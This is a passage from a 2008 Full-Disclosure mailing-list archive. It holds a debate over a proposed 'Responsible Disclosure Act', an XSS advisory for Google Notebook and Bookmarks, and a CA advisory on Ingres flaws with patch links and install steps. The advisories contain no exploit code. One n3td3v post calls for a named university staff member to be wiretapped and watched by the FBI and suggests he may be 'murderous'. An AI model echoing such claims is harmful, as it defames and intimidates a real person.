<4b6ee9310807250356y5282dbbfr750a8a27c5a94079@mail.gmail.com> <002401c8ee4e$087f4f40$1214dd80@corp.emc.com> <6158bb410808051725o6edd6ce2x3414eb0ee45b8485@mail.gmail.com> Message-ID: <000601c8f7bb$83a5b800$8af12800$@com> Again, irony abounds ... pushing for a "Responsible Disclosure Act" on a forum named "Full Disclosure" ... makes me smile. (Not saying either side is right/wrong, just throwing that out there) Nits: * Said laws would only apply within a given jurisdiction ... so disclosures would simply come, or appear to come, from outside said jurisdiction. * Who gets to decide how many machines were comprimised? Some sources never divulge, some drastically over-inflate. * Who defines what "responsible" is? Some argue that telling the vendor as hitting send/post counts, some say 1 week, etc. In some cases, maybe a month isn't enough for patch deployment ... is that still "responsible"? * I think the "big guys" you reference could come up with answers, but prefer things the way they are now. .... just supposition on my part there ... ... and given the govt's previous track record of "cyber" issues, let's pause and reflect if we want them trying again. /TJ >> ----- Original Message ----- >> From: "n3td3v" >> To: >> Sent: Friday, July 25, 2008 6:56 AM >> Subject: [Full-disclosure] Kaminsky's Law >> >> >>> So what you're saying is HD Moore and |)ruid are exploiting a loop >>> hole in the law to do what they do... looks like we need to get the >>> law tightened. >>> >>> I say a "Responsible Disclosure Act" is drawn up, and anyone who >>> breaks it goes to jail. >>> >>> That will mean: >>> >>> - People will think twice before hitting send on blog entries, >>> >>> - People will think twice about releasing code early, >>> >>> - That the decided time line for disclosure can be enforced, >>> >>> - That the people who release information and/or code early, they get >>> fined for every computer system compromised because of the >>> vulnerability information and/or code disclosure, on top of the jail >>> sentence. >>> >>> So instead for the future its not just a verbal contract for >>> responsible disclosure, its a legally binding contract as well >>> meaning if the Responsible Disclosure Act has been signed by the >>> security researcher and its affected vendors, then ass hats like HD >>> Moore and >>> |)ruid are breaking the law. >>> >>> The details are a bit fuzzy right now, but i'm sure the big guys in >>> the industry can draw up proper rules for a Responsible Disclosure >>> Act. >>> >>> Its likely the Responsible Disclosure Act would only be used in >>> exceptional circumstances like this DNS caching vulnerability, and >>> the approval of the act per vulnerability case has to be decided on >>> by a judge in a court of law, so that the Responsible Disclosure Act >>> can't be over used and abused, to keep the use of the act fair and >>> proportional in relation to the level of the threat. >>> >>> That means, Full-Disclosure of vulnerability information and/or >>> wouldn't be illegal all the time, just in exceptional circumstances >>> that has to be OK'd by a judge. >>> >>> This safe guards the deployment of a patch or patches while telling >>> what the importance of patching is to the public, while disallowing >>> security researchers to release information and/or code before the >>> time line for responsible disclosure. >>> >>> So the scenario would be, >>> >>> jake: hey did you hear about the patches being deployed and the news >>> reports about the flaw and why the patch is critical? >>> >>> joe: yes, but the responsible disclosure act has been signed so we >>> need to wait until it expires before we can share info. >>> >>> jake: no way, whats the assigned disclosure date? >>> >>> joe: the standard 4 weeks, although with the responsible disclosure >>> act, after the 4 weeks, the security researcher and vendors can go >>> back to the judge to ask for an extra 4 week extension onto that, so >>> it could be eight weeks bro before we can become famous for five >>> minutes by releasing attack code. >>> >>> jake: ah, sucks for us, but yeah if the judge has approved the >>> signing there isn't alot we can do unless we want to be labeled >>> criminals, and hunted down by interpol. >>> >>> What has to be told to the community under the act: >>> >>> - The community must be told the Responsible Disclosure Act has been >>> signed and OK'd by a judge. >>> >>> - The community must be told the date the Responsible Disclosure Act >>> expires and disclosure can be made. >>> >>> - The community must be told that security researcher and vendor can >>> go back to the judge after 4 weeks and ask for extension of the act >>> if extra time is needed, this must be announced to the community >>> again with notice. >>> >>> All members of the community who break the Responsible Disclosure Act >>> are breaking the law and face charges. >>> >>> Obviously this is just an email I rattled up in five minutes during a >>> water machine break, so the big guys in the industry can take these >>> ideas and throw them into a properly put together act. >>> >>> I think Dan Kaminsky should lobby the industry and the government to >>> get something like this drawn up, since he is the one who has >>> inspired me to come up with the Responsible Disclosure Act. >>> >>> I kind of feel sorry for Dan Kaminsky, and that HD Moore and |)ruid >>> had to be dick heads about releasing code on purpose against his >>> request of Dan Kaminsky, the vendors and people who agree with >>> responsible disclosure, especially in exceptional circumstances like >>> the DNS flaw. >>> >>> Maybe we should name it "Kaminsky's Law" out of Solidarity for Dan. >>> >>> All the best, >>> >>> n3td3v >>> >>> >>> ---------- Forwarded message ---------- >>> From: >>> Date: Thu, Jul 24, 2008 at 5:56 PM >>> Subject: Re: [Full-disclosure] Comments on: DNS exploit code is in >>> the wild >>> To: n3td3v >>> Cc: full-disclosure at lists.grok.org.uk >>> >>> >>> On Thu, 24 Jul 2008 16:17:08 BST, n3td3v said: >>> >>>> This whole HD Moore savior of info sec thing has gone on long >>>> enough, its time to see him for what he is and get him slammed up in >>>> jail along with his counterpart |)ruid. >>> >>> I'll point out that you happen to live in the country that invented >>> the concept of "habeus corpus". In other words, you cant slam him in >>> jail unless you actually *charge* him with something. >>> >>> Please tell us which countr(y|ies) you intend to have him charged, >>> and what offense. Specific references to statutes would be >>> appreciated (for starters, I'll help you out and point out that in >>> the US, he probably could *not* be charged under 17 USC 1201 (the >>> DMCA anti-circumvention clause), nor under >>> 18 >>> USC 1030 (the primary federal anti-hacking statute), unless you have >>> actual evidence that HD personally hacked into a computer covered by >>> 18 USC 1030. >>> You >>> run into similar issue with 18 USC 2701 (access to stored communication). >>> >>> You *might* be able to make a case under 18 USC 2512 (dealing in >>> devices for intercepting communications), except that there's the >>> nasty clause "knowing or having reason to know that the design of >>> such device renders it primarily useful for the purpose of the >>> surreptitious interception of wire, oral, or electronic >>> communications;" - and you'd fail on the "primarily" because there's >>> lots of *other* uses for Metasploit. >>> >>> He *is* probably in violation of 36 USC 117, 7 USC 411b, and 26 USC >>> 7523(a)(1), however. >>> >>> _______________________________________________ >>> Full-Disclosure - We believe in it. >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>> Hosted and sponsored by Secunia - http://secunia.com/ >>> >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > >_______________________________________________ >Full-Disclosure - We believe in it. >Charter: http://lists.grok.org.uk/full-disclosure-charter.html >Hosted and sponsored by Secunia - http://secunia.com/ From jf at danglingpointers.net Wed Aug 6 20:15:51 2008 From: jf at danglingpointers.net (jf) Date: Wed, 6 Aug 2008 19:15:51 +0000 (UTC) Subject: [Full-disclosure] Media backlash begins against HD Moore and I)ruid In-Reply-To: <21881.1217962645@turing-police.cc.vt.edu> References: <4b6ee9310807261119s32874459oa14360cdbe0f88b8@mail.gmail.com> <4b6ee9310808031436j5af63b56oa70e646e4948bf34@mail.gmail.com> <15949.1217821466@turing-police.cc.vt.edu> <4b6ee9310808050558w6761089fvdd9d8a2b064bd575@mail.gmail.com> <16480.1217956110@turing-police.cc.vt.edu> <4b6ee9310808051040i3936d118gd596a8689d41de62@mail.gmail.com> <21881.1217962645@turing-police.cc.vt.edu> Message-ID: > And even if they *got* attacked, it's quite possible that the upsides of not > bothering to do something outweighed the risks. If you estimate that the > cost (including "things you could have spent your time doing") is more than > the losses, why bother? "Even if we *got* whacked, we'd lose maybe $500. But > in the time I'd waste dealing with the issue, I could generate something that > will get us $2,000 in revenue. So if I fix it, I lose $1500, and if I ignore > it, I come out $1,500 ahead if we get hit, and $2,000 if we don't". so as a student worker, thats what, like a month of your time? From xploitable at gmail.com Wed Aug 6 15:49:24 2008 From: xploitable at gmail.com (n3td3v) Date: Wed, 6 Aug 2008 15:49:24 +0100 Subject: [Full-disclosure] Media backlash begins against HD Moore and I)ruid In-Reply-To: References: <4b6ee9310807261119s32874459oa14360cdbe0f88b8@mail.gmail.com> <4b6ee9310808031436j5af63b56oa70e646e4948bf34@mail.gmail.com> <15949.1217821466@turing-police.cc.vt.edu> <4b6ee9310808050558w6761089fvdd9d8a2b064bd575@mail.gmail.com> <16480.1217956110@turing-police.cc.vt.edu> <4b6ee9310808051040i3936d118gd596a8689d41de62@mail.gmail.com> <21881.1217962645@turing-police.cc.vt.edu> Message-ID: <4b6ee9310808060749t25beac58nc4ad38e0f81875a@mail.gmail.com> On Wed, Aug 6, 2008 at 8:15 PM, jf wrote: >> And even if they *got* attacked, it's quite possible that the upsides of not >> bothering to do something outweighed the risks. If you estimate that the >> cost (including "things you could have spent your time doing") is more than >> the losses, why bother? "Even if we *got* whacked, we'd lose maybe $500. But >> in the time I'd waste dealing with the issue, I could generate something that >> will get us $2,000 in revenue. So if I fix it, I lose $1500, and if I ignore >> it, I come out $1,500 ahead if we get hit, and $2,000 if we don't". > > so as a student worker, thats what, like a month of your time? > The guy definitely needs wire tapped and perhaps a psychologist. Especially when he started ranting about money and the value of human life in relation to security. I just hope Virgina Tech and the F.B.I get involved in montioring him for his comments, especially after the Virginia Tech massacre and the likes. We could have a fruit ball member of staff at the institute considering something criminal to cut corners in cyber security... or even something murderous in real life depending on what type of mental condition he has actually acquired to make him talk like this. On Tue, Aug 5, 2008 at 9:57 PM, wrote: > They calculate a "value of a life", and use it to evaluate things like > environmental and safety regulations: If a life is worth $5M, and the > regulation is projected to save 500 lives (via lower risk of cancer, fewer car > crashes, whatever), the regulation has to cost less than $2.5B to implement to > be worth it. If it costs $2B, but only saves 50 lives, that's $40M per life > and not worth it. > All the best, n3td3v From alfredo.melloni at gmail.com Wed Aug 6 16:39:13 2008 From: alfredo.melloni at gmail.com (Alfredo Melloni) Date: Wed, 6 Aug 2008 17:39:13 +0200 Subject: [Full-disclosure] Google Notebook and Google Bookmarks Cross Site Scripting Vulnerabilities Message-ID: Google Notebook and Google Bookmarks Cross Site Scripting Vulnerabilities I. Background: Google Notebook is a service where it's possible to "add text, images, and links from web pages without leaving your browser window." Google Bookmarks is a service where it's possible to save bookmarks. II. Description: Three cross site scripting vulnerabilities were identified inside Google Notebook. A remote attacker can make a malformed block notes and invite, through the sharing option inside Google Notebook, other users to see it to obtain their cookie. User interaction is required to exploit all three vulnerabilies. Browser affected: Firefox 3. Browser not affected: Internet Explorer 7, Opera 9.5, Safari 3. One cross site scripting vulnerability was identified inside Google Bookmarks. A remote attacker can make a malformed bookmark inside his account and then share it with other users to obtain their cookie. User interaction is required to exploit this vulnerability. Browser affected: Mozilla Firefox 3, Internet Explorer 7, Opera 9.5, Safari 3 III. Vendor Response: Google acknowledged 4 vulnerabilities and has deployed a fix for them. IV. Disclosure timeline: 23/07/08 - First vulnerability discovered 23/07/08 - Google informed 24/07/08 - Google confirmed first bug 31/07/08 - Google fixed the first vulnerability 31/07/08 - Three new vulnerabilities discovered 31/07/08 - Google informed 31/07/08 - Google confirmed these three new bugs 01/08/08 - Google fixed all vulnerabilities submitted Regards Alfredo Melloni -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080806/51c013e6/attachment.html From James.Williams at ca.com Wed Aug 6 16:49:52 2008 From: James.Williams at ca.com (Williams, James K) Date: Wed, 6 Aug 2008 11:49:52 -0400 Subject: [Full-disclosure] CA Products That Embed Ingres Multiple Vulnerabilities Message-ID: <649CDCB56C88AA458EFF2CBF494B6204053903FB@USILMS12.ca.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Title: CA Products That Embed Ingres Multiple Vulnerabilities CA Advisory Date: 2008-08-01 Reported By: iDefense Labs Impact: A remote attacker can execute arbitrary code, gain privileges, or cause a denial of service condition. Summary: CA products that embed Ingres contain multiple vulnerabilities that can allow a remote attacker to execute arbitrary code, gain privileges, or cause a denial of service condition. These vulnerabilities exist in the products and on the platforms listed below. These vulnerabilities do not impact any Windows-based Ingres installation. The first vulnerability, CVE-2008-3356, allows an unauthenticated attacker to potentially set the user and/or group ownership of a verifydb log file to be Ingres allowing read/write permissions to both. The second vulnerability, CVE-2008-3357, allows an unauthenticated attacker to exploit a pointer overwrite vulnerability to execute arbitrary code within the context of the database server process. The third vulnerability, CVE-2008-3389, allows an unauthenticated attacker to obtain ingres user privileges. However, when combined with the unsecured directory privileges vulnerability (CVE?2008-3357), root privileges can be obtained. Mitigating Factors: These vulnerabilities do not impact any Windows-based Ingres installation. Severity: CA has given these vulnerabilities a High risk rating. Affected Products: Admin r8.1 SP2 Advantage Data Transformer r2.2 Allfusion Harvest Change Manager r7.1 CA ARCserve Backup for Unix r11.1, r11.5 GA/SP1/SP2/SP3 CA ARCserve Backup for Linux r11.1, r11.5 GA/SP1/SP2/SP3 CA Directory r8.1 CA Job Management Option R11.0 CA Single Sign-On r8.1 CleverPath Aion BPM r10.1, r10.2 EEM 8.1, 8.2, 8.2.1 eTrust Audit/SCC 8.0 sp2 Identity Manager r12 NSM 3.0 0305, 3.1 0403, r3.1 SP1 0703, r11 Unicenter Asset Management r11.1, r11.2 Unicenter Remote Control r11.2 Unicenter Service Catalog r2.2, r11.1 Unicenter Service Metric Analysis r11.1 Unicenter ServicePlus Service Desk 6.0, r11, r11.1, r11.2 Unicenter Software Delivery r11.1, r11.2 Unicenter Workload Control Center r11 Affected Platforms: 1. Ingres verifydb file create permission override (CVE-2008-3356) This vulnerability impacts all platforms except Windows. 2. Ingres un-secure directory privileges with utility ingvalidpw (CVE - 2008-3357) This vulnerability impacts only Linux and HP platforms. 3. Ingres verifydb, iimerge, csreport buffer overflow (CVE-2008-3389) This vulnerability impacts only Linux and HP platforms. Status and Recommendation: The most prudent course of action for affected customers is to download and apply the corrective maintenance. However, updates are provided only for the following releases: 2.6 and r3 Important: Customers using products that embed an earlier version of Ingres r3 should upgrade Ingres to the release that is currently supported (3.0.3/103 on Linux and 3.0.3/211 on UNIX platforms) before applying the maintenance updates. Please contact your product's Technical Support team for more information. For these products: Admin r8.1 SP2 CA ARCserve Backup for Linux r11.5 SP2/SP3 CA Directory r8.1 CA Job Management Option R11.0 CA Single Sign-On r8.1 EEM 8.2 EEM 8.2.1 Identity Manager r12 NSM r11 Unicenter Asset Management r11.1 Unicenter Asset Management r11.2 Unicenter Remote Control r11.2 Unicenter Service Catalog r11.1 Unicenter Service Metric Analysis r11.1 Unicenter ServicePlus Service Desk r11 Unicenter ServicePlus Service Desk r11.1 Unicenter ServicePlus Service Desk r11.2 Unicenter Software Delivery r11.1 Unicenter Software Delivery r11.2 Unicenter Workload Control Center r11 Apply the update below that is listed for your platform (note that URLs may wrap): AIX [3.0.3 (r64.us5/211)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.2 11.12833-r64-us5.tar.z HP-UX Itanium [3.0.3 (i64.hpu/211)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.2 11.12831-i64-hpu.tar.z HP-UX RISC [3.0.3 (hp2.us5/211)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.2 11.12830-hp2-us5.tar.z Linux AMD [3.0.3 (a64.lnx/211)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.2 11.12835-a64-lnx.tar.z Linux Intel 32bit [3.0.3 (int.lnx/103)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.1 03.12836-int-lnx.tar.z Linux Itanium [3.0.3 (i64.lnx/211)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.2 11.12838-i64-lnx.tar.z Solaris SPARC [3.0.3 (su9.us5/211)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.2 11.12834-su9-us5.tar.z Solaris x64/x86 [3.0.3 (a64.sol/211)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/patch-3.0.3.2 11.12832-a64-sol.tar.z Ingres r3 Vulnerability Updates Install Steps (August 1, 2008) Unix/Linux: 1. Log on to your system using the installation owner account and make sure the environment is set up correctly: 1. II_SYSTEM must be set to the Ingres system files 2. PATH must include $II_SYSTEM/bin and $II_SYSTEM/utility directories. 2. Change directory to the root directory of the Ingres installation or use a previously created directory. cd $II_SYSTEM/ingres or cd 3. Copy the download maintenance update file in to the current directory and uncompress 4. Read in the update file with the following commands: umask 022 tar xf [update_file] This will create the directory: $II_SYSTEM/ingres/patchXXXXX or /patchXXXXX Note: ?XXXXX' in patchXXXXX refers to the update number 5. Stop all Ingres processes with the ?ingstop' utility: ingstop 6. Change directory to the patch directory: cd patchXXXXX 7. Within the patch directory run the following command: ./utility/iiinstaller Please check the $II_SYSTEM/ingres/files/patch.log file to make sure the patch was applied successfully. Also check the $II_SYSTEM/ingres/version.rel to make sure the patch is referenced. Note: The patch can also be installed silently using the ?-m' flag with iiinstaller: ./utility/iiinstaller -m 8. Once the patch install has been complete, re-link the iimerge binary with the following command: iilink 9. Ingres can then be restarted with the ?ingstart' utility: ingstart For these products: Advantage Data Transformer r2.2 Allfusion Harvest Change Manager r7.1 ARCserve for Linux r11.5 GA/SP1 CleverPath Aion BPM r10.1 CleverPath Aion BPM r10.2 Apply the build below that is listed for your platform (note that URLs may wrap): AIX ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/install-3.0.3 .211.12833-r64-us5.tar HP-UX Itanium ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/install-3.0.3 .211.12831-i64-hpu.tar HP-UX RISC ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/install-3.0.3 .211.12830-hp2-us5.tar Linux AMD EI build ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/ingres-3.0.3- 211-EI-linux-x86_64.tar.gz Linux AMD II build ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/ingres-3.0.3- 211-linux-x86_64.tgz Linux Intel EI build ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/ingres-3.0.3- 103-EI-linux-i386.tgz Linux Intel II build ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/ingres-3.0.3- 103-pc-linux-i386.tgz Linux Itanium EI build ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/ingres-3.0.3- 211-EI-linux-ia64.tar.gz Linux Itanium II build ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/ingres-3.0.3- 211-linux-ia64.tgz Solaris SPARC ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/install-3.0.3 .211.12834-su9-us5.tar Solaris x64/x86 ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/r3/install-3.0.3 .211.12832-a64-sol.tar Ingres r3 Build Install Steps (August 1, 2008) Important: Prior to installing the build, a full operating system backup of the $II_SYSTEM/ingres directory on Unix/Linux and %II_SYSTEM%\ingres directory on Windows must be taken with Ingres completely shut down. Also, a backup of any other DATA locations that you may have must be taken, again with Ingres shut down. In case there is a problem with the update install, this allows Ingres to be restored from the backup. Unix: 1. Log in to the system as the installation owner and make sure the environment is set up correctly: 1. II_SYSTEM must be set to the Ingres home directory 2. PATH must include $II_SYSTEM/ingres/bin and $II_SYSTEM/ingres/utility directories 3. Add $II_SYSTEM/ingres/lib to the shared library path 4. Set TERM to ?vt100' and TERM_INGRES to ?vt100fx' 2. Copy the downloaded update file to the /tmp directory and uncompress 3. Read in the update file with the following commands: umask 022 tar xf [update_file] This creates a directory containing the distribution and other files. 4. Stop all applications that may be connected to or using any of the files in the Ingres instance. 5. Stop all Ingres processes with the ?ingstop' utility: ingstop 6. Important: Take an operating system backup of the $II_SYSTEM/ingres directory and other DATA locations that you may have elsewhere. Also, copy the $II_SYSTEM/ingres/files/config.dat and $II_SYSTEM/ingres/files/symbol.tbl files to a safe location to ensure that the configuration can be restored. 7. From the root directory of the Ingres installation ($II_SYSTEM/ingres), run the following command: tar xf /tmp//ingres.tar install 8. Run the following command: install/ingbuild 9. The initial install screen appears. 10. In the Distribution medium enter the full path to the ?ingres.tar' file (including the file) (See step 4). 11. Choose PackageInstall from the list of installation options and then choose ?Stand alone DBMS Server' from the list of packages. Then choose ExpressInstall. 12. Choose Yes in the pop-up screen and press Enter key. The install utility verifies that each component was transferred properly from the distribution medium. When this is finished (without errors), another pop-up screen for setting up the components comes up. 13. Select Yes and press Enter key to go to the Setup program. 14. Once the installation is complete, check the $II_SYSTEM/ingres/files/install.log for any errors. Also, check the $II_SYSTEM/ingres/version.rel file to verify the new build is referenced; this should show 3.0.3 for the build. 15. If there are no errors, then restore the $II_SYSTEM/ingres/files/config.dat and $II_SYSTEM/ingres/files/symbol.tbl files from the copies made in step 6 to replace the existing files. 16. Start Ingres using the ?ingstart' utility: ingstart 17. Upgrade the databases in the installation to the new release level: upgradedb -all Linux: 1. Log on to the machine as ?root'. 2. Copy the downloaded build update file and to a previously chosen directory and uncompress. 3. Read in the update file with the following command: tar xf [update file] This creates a directory containing rpm packages for all of the Ingres tools. 4. Shut down any non-Ingres application(s) that may be connected to or using any of the files in the specified Ingres instance. 5. Stop all Ingres processes with the ?ingstop' utility: ingstop 6. Important: Take an operating system backup of the $II_SYSTEM/ingres directory and other DATA locations that you may have elsewhere. 7. From the directory that was created in step 3, install the update rpms with the following command: rpm ?Uvh *.rpm If the following error is seen for either the ?ca-ingres-documentation-3.0.3-103', the ?ca-ingres-CATOSL-3.0.3-103' or the ?ca-cs-utils-11.0.04348-0000' (or all of them) packages, remove them from the directory containing the rpms and re-run the above command: package is already installed 8. If the installation finishes successfully, then log on as ?ingres' to the machine and start Ingres using the ?ingstart' utility: ingstart 9. Upgrade ?mdb' database with the following command: upgradedb -all For these products: CA ARCserve Backup for Unix r11.1 CA ARCserve Backup for Unix r11.5 GA/SP1/SP2 CA ARCserve Backup for Unix r11.5 SP3 CA ARCserve Backup for Linux r11.1 EEM 8.1 eTrust Audit/SCC 8.0 sp2 NSM 3.0 0305 NSM 3.1 0403 NSM r3.1 SP1 0703 Unicenter Service Catalog r2.2 Unicenter ServicePlus Service Desk 6.0 Apply the update below that is listed for your platform (note that URLs may wrap): AIX 32bit [2.6/xxxx (rs4.us5/00)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12718.tar.Z AIX 64bit [2.6/xxxx (r64.us5/00)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12798.tar.Z HP-UX with ARCserve 11.1 or 11.5/GA/SP1/SP2/SP3 https://support.ca.com/irj/portal/anonymous/solndtls?aparNo=RO01277&os=HP&a ctionID=3 HP-UX Itanium [2.6/xxxx (i64.hpu/00)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12748.tar.Z HP-UX RISC 32bit [2.6/xxxx (hpb.us5/00)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12742.tar.Z HP-UX RISC 32bit [2.6/xxxx (hpb.us5/00)DBL] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12888.tar.Z HP-UX RISC 64bit [2.6/xxxx (hp2.us5/00)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12749.tar.Z HP Tru64 UNIX [2.6/xxxx (axp.osf/00)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12676.tar.Z Linux AMD64 [2.6/xxxx (a64.lnx/00)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12809.tar.Z Linux Intel 32bit [2.6/xxxx (int.lnx/00)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12645.tar.Z Linux Intel 32bit [2.6/xxxx (int.lnx/00)DBL] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12647.tar.Z Linux Intel 32bit [2.6/xxxx (int.lnx/00)LFS] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12646.tar.Z Linux Itanium [2.6/xxxx (i64.lnx/00)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12648.tar.Z Linux S/390 [2.6/xxxx (ibm.lnx/00)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12877.tar.Z Solaris SPARC 32bit [2.6/xxxx (su4.us5/00)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12713.tar.Z Solaris SPARC 32bit double [2.6/xxxx (su4.us5/00)DBL] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12879.tar.Z Solaris SPARC 64bit [2.6/xxxx (su9.us5/00)] ftp://ftp.ca.com/CAproducts/ips/MDB/Generic_Ingres/Patches/2.6/p12751.tar.Z Ingres 2.6 Vulnerability Updates Install Steps (August 1, 2008) Unix/Linux: 1. Log on to your system using the installation owner account and make sure the environment is set up correctly: 1. II_SYSTEM must be set to the Ingres system files 2. PATH must include $II_SYSTEM/bin and $II_SYSTEM/utility directories. 2. Change directory to the root directory of the Ingres installation or use a previously created directory. cd $II_SYSTEM/ingres or cd 3. Copy the download maintenance update file in to the current directory and uncompress 4. Read in the update file with the following commands: umask 022 tar xf [update_file] This will create the directory: $II_SYSTEM/ingres/patchXXXXX or /patchXXXXX Note: ?XXXXX' in patchXXXXX refers to the update number 5. Stop all Ingres processes with the ?ingstop' utility: ingstop 6. Change directory to the patch directory: cd patchXXXXX 7. Within the patch directory run the following command: ./utility/iiinstaller Please check the $II_SYSTEM/ingres/files/patch.log file to make sure the patch was applied successfully. Also check the $II_SYSTEM/ingres/version.rel to make sure the patch is referenced. Note: The patch can also be installed silently using the ?-m' flag with iiinstaller: ./utility/iiinstaller -m 8. Once the patch install has been complete, re-link the iimerge binary with the following command: iilink 9. Ingres can then be restarted with the ?ingstart' utility: ingstart How to determine if you are affected: For these products: Admin r8.1 SP2 ARCserve for Linux r11.5 SP2/SP3 CA Directory r8.1 CA Job Management Option R11.0 CA Single Sign-On r8.1 EEM 8.2 EEM 8.2.1 Identity Manager r12 NSM r11 Unicenter Asset Management r11.1 Unicenter Asset Management r11.2 Unicenter Remote Control r11.2 Unicenter Service Catalog r11.1 Unicenter Service Metric Analysis r11.1 Unicenter ServicePlus Service Desk r11 Unicenter ServicePlus Service Desk r11.1 Unicenter ServicePlus Service Desk r11.2 Unicenter Software Delivery r11.1 Unicenter Software Delivery r11.2 Unicenter Workload Control Center r11 The Ingres release information is maintained in %II_SYSTEM%\ingres\version.rel: UNIX or Linux: cat version.rel The release identifier will be as follows: Operating System Release identifier HP Sparc 32/64bit II 3.0.3 (hp2.us5/211) HP Itanium II 3.0.3 (i64.hpu/211) Intel Solaris 32/64bit II 3.0.3 (a64.sol/211) AIX 32/64bit II 3.0.3 (r64.us5/211) Solaris 32/64bit II 3.0.3 (su9.us5/211) AMD Linux II 3.0.3 (a64.lnx/211) Intel Linux II 3.0.3 (int.lnx/103) Itanium Linux II 3.0.3 (i64.lnx/211) Notes: 1. You would need to install the Ingres build instead of the patch if either of the following is true: 1. If the Ingres release for your platform is not 3.0.3 in the release identifier or 2. The Ingres release is 3.0.3 but the build level is not 103 for Linux and 211 for all the Unix platforms. If either of the above is true then download and apply the latest build for your operating system(s). 2. If the OS platform you are running Ingres on is not listed, please contact Technical Support. For these products: Advantage Data Transformer r2.2 Allfusion Harvest Change Manager r7.1 ARCserve for Linux r11.5 GA/SP1 CleverPath Aion BPM r10.1 CleverPath Aion BPM r10.2 The maintenance updates are provided for the latest r3 builds supported by CA which are 3.0.3/103 (Linux) and 3.03/211 (UNIX platforms). If the build embedded is earlier than 3.0.3, it has to be upgraded to 3.0.3 to fix the vulnerabilities. The Ingres release information is maintained in %II_SYSTEM%\ingres\version.rel: UNIX or Linux: cat version.rel The release identifier will be as follows: Operating System Release identifier HP Sparc 32/64bit II 3.0.3 (hp2.us5/211) HP Itanium II 3.0.3 (i64.hpu/211) Intel Solaris 32/64bit II 3.0.3 (a64.sol/211) AIX 32/64bit II 3.0.3 (r64.us5/211) Solaris 32/64bit II 3.0.3 (su9.us5/211) AMD Linux II 3.0.3 (a64.lnx/211) Intel Linux II 3.0.3 (int.lnx/103) Itanium Linux II 3.0.3 (i64.lnx/211) Important: For Linux (AMD, Intel and Itanium) platforms, after applying the build provided on this page, please download and apply the maintenance update. For the other platforms, the builds are patched to the latest maintenance update. Note: 1. If the release you are using is already 3.0.3 build 103 on Linux and 3.0.3 build 211 on Unix, then download and install the maintenance update. 2. If the OS platform you are running Ingres on is not listed, please contact Technical Support. For these products: CA ARCserve Backup for Unix r11.1 CA ARCserve Backup for Unix r11.5 GA/SP1/SP2 CA ARCserve Backup for Unix r11.5 SP3 CA ARCserve Backup for Linux r11.1 EEM 8.1 eTrust Audit/SCC 8.0 sp2 NSM 3.0 0305 NSM 3.1 0403 NSM r3.1 SP1 0703 Unicenter Service Catalog r2.2 Unicenter ServicePlus Service Desk 6.0 The Ingres release information is maintained in %II_SYSTEM%\ingres\version.rel: UNIX or Linux: cat version.rel The release identifier will be as follows: Operating System Release identifier AIX 32bit II 2.6/xxxx (rs4.us5/00) AIX 64bit II 2.6/xxxx (r64.us5/00) HP-UX Itanium II 2.6/xxxx (i64.hpu/00) HP-UX RISC 32bit II 2.6/xxxx (hpb.us5/00) HP-UX RISC 32bit II 2.6/xxxx (hpb.us5/00)DBL HP-UX RISC 64bit II 2.6/xxxx (hp2.us5/00) HP Tru64 UNIX II 2.6/xxxx (axp.osf/00) Linux AMD64 II 2.6/xxxx (a64.lnx/00) Linux Intel 32bit II 2.6/xxxx (int.lnx/00) Linux Intel 32bit II 2.6/xxxx (int.lnx/00)DBL Linux Intel 32bit II 2.6/xxxx 